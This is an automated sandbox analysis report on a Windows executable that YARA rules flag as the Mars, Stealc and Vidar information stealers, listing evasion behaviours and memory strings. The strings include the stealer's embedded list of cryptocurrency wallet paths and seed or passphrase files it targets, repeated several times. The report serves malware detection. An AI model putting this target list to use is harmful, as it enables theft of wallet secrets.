Source: Amcache.hve.6.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: GHDHDGHJ.0.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: GHDHDGHJ.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Amcache.hve.6.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: GHDHDGHJ.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr Binary or memory string: VMware, Inc.
Source: GHDHDGHJ.0.dr Binary or memory string: discord.comVMware20,11696428655f
Source: Amcache.hve.6.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: GHDHDGHJ.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Amcache.hve.6.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: GHDHDGHJ.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: GHDHDGHJ.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: GHDHDGHJ.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: GHDHDGHJ.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Amcache.hve.6.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: GHDHDGHJ.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: GHDHDGHJ.0.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: GHDHDGHJ.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Amcache.hve.6.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: GHDHDGHJ.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: GHDHDGHJ.0.dr Binary or memory string: outlook.office.comVMware20,11696428655s
Source: GHDHDGHJ.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: GHDHDGHJ.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Amcache.hve.6.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.6.dr Binary or memory string: vmci.syshbin`
Source: GHDHDGHJ.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Amcache.hve.6.dr Binary or memory string: \driver\vmci,\driver\pci
Source: GHDHDGHJ.0.dr Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Amcache.hve.6.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: GHDHDGHJ.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Amcache.hve.6.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: GHDHDGHJ.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe API call chain: ExitProcess graph end node
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_00417B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00417B4E
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_00416240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00416240
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_00415DC0 mov eax, dword ptr fs:[00000030h] 0_2_00415DC0
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_00404C70 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle, 0_2_00404C70
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_00419DC7 SetUnhandledExceptionFilter, 0_2_00419DC7
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_00417B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00417B4E
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_004173DD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_004173DD
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CC9B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6CC9B66C
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CC9B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6CC9B1F7
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CE4AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6CE4AC62

HIPS / PFW / Operating System Protection Evasion
barindex
Searches for specific processes (likely to inject)
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_00415D00 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00415D00
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CC9B341 cpuid 0_2_6CC9B341
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00414570
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_00414450 GetProcessHeap,HeapAlloc,GetLocalTime,wsprintfA, 0_2_00414450
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_004143C0 GetProcessHeap,HeapAlloc,GetUserNameA, 0_2_004143C0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_004144B0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA, 0_2_004144B0

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Overwrites Mozilla Firefox settings
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm Jump to behavior
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.6.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Mars stealer
Source: Yara match File source: 0.3.Wb9LZ5Sn1l.exe.47a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Wb9LZ5Sn1l.exe.2b50e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Wb9LZ5Sn1l.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Wb9LZ5Sn1l.exe.2b50e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.3114034341.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.3112781887.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2304314861.00000000047A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: 00000000.00000002.3114165780.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Wb9LZ5Sn1l.exe PID: 6524, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: 0.3.Wb9LZ5Sn1l.exe.47a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Wb9LZ5Sn1l.exe.2b50e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Wb9LZ5Sn1l.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Wb9LZ5Sn1l.exe.2b50e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.3114034341.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.3112781887.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2304314861.00000000047A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.3112781887.0000000000447000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Wb9LZ5Sn1l.exe PID: 6524, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3114165780.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Electrum-LTC\wallets\\*.*
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3112781887.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: |1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3112781887.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: |1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3125781608.000000001D3D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\*.*
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3114165780.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\\window-state.json*
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3112781887.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: |1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3114165780.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\\window-state.json*
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3112781887.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: |1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3112781887.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: |1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3112781887.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: |1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3112781887.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: |1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda 